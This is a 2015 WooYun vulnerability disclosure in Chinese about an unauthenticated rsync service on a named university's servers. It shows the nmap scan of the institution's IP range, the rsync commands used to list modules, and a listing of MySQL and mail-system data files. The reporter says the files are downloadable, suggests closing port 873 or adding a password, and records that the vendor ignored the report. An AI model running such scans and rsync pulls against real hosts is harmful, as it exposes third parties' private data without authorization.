东北财经大学一些重要信息泄漏 | wooyun-2015-0140943

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0140943

漏洞标题：

东北财经大学一些重要信息泄漏

漏洞详情

披露状态：

2015-09-13：细节已通知厂商并且等待厂商处理中
2015-09-18：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

东北财经大学一些重要信息泄漏

详细说明：

nmap -n --open -p 873 www.dufe.edu.cn/24
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-13 17:18 CST
Nmap scan report for 202.199.160.186
Host is up (0.0020s latency).
PORT    STATE SERVICE
873/tcp open  rsync
Nmap scan report for 202.199.160.209
Host is up (0.0022s latency).
PORT    STATE SERVICE
873/tcp open  rsync
Nmap done: 256 IP addresses (67 hosts up) scanned in 4.29 seconds

root@kali:~# rsync 202.199.160.209:: -av
mysql          	
mysql_index    	
mysql_log      	
root@kali:~# rsync 202.199.160.209::mysql
drwx------          4,096 2015/08/21 23:14:38 .
-rw-rw----          4,332 2015/04/21 16:06:57 columba.dufe.edu.cn.err
-rw-rw----              0 2014/10/14 10:48:37 columba.dufe.edu.cn.err-old
-rw-rw----    268,435,456 2015/09/13 17:15:30 ib_logfile0
-rw-rw----    268,435,456 2015/09/13 17:15:35 ib_logfile1
-rw-rw----     27,262,976 2015/09/13 17:15:30 ibdata1
-rw-rw----         19,845 2013/09/04 19:53:08 mail2.err
-rw-rw----  1,073,742,071 2015/08/21 23:14:38 mysql-bin.000013
-rw-rw----    778,411,172 2015/09/13 17:15:14 mysql-bin.000014
-rw-rw----             38 2015/08/21 23:14:38 mysql-bin.index
drwxr-xr-x          4,096 2013/08/20 18:01:19 binlog
drwx------         16,384 2014/11/06 14:56:27 eyou_mail
drwx------          4,096 2013/07/18 19:12:10 mysql
drwx------          4,096 2013/07/18 19:12:03 test

可以下载，是一个邮件系统
下载之后发现分析不出什么，唉技术有限啊

漏洞证明：

如上

修复方案：

把873关了吧，或者加个密码也行

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-09-18 20:32

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲@乌云